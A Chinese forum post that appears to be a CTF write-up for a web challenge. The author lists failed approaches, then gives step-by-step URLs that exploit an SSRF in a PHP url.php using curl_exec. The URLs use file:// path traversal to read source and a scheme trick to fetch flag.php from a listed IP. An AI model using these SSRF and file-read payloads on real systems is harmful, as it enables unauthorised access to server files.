首页
论坛
课程
招聘
[原创]第四题 飞蛾扑火 踩坑贴
2022-5-17 13:08 2195

[原创]第四题 飞蛾扑火 踩坑贴

2022-5-17 13:08
2195

第0天,掉dokuwiki坑,文件都上传了,不解析拿不到shell;痛苦
第1天,掉header坑,改了十多种头,组合N个IP都没用;绝望
第2天,掉gopher坑,怎么绕都不行;无奈

 

结果发现是curl_exec的独特特性,还是知识面浅了,致敬http://cn-sec.com/archives/151034.html:

图片描述

 

=====================

  1. http://121.36.145.157:8044/
  2. 查看源码
  3. http://121.36.145.157:8044/phpinfo.php 得到物理路径
  4. http://121.36.145.157:8044/url.php?url=file://127.0.0.1/../../../../../var/www/html/url.php 得到源码
  5. http://121.36.145.157:8044/url.php?url=123.57.254.42://127.0.0.1/../flag.php 得到flag
    图片描述
    flag{xxx_999()xx*@eeEEE}

【看雪培训】《Adroid高级研修班》2022年夏季班招生中!

最后于 2022-5-17 13:09 被VitoYane编辑 ,原因:
收藏
点赞1
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回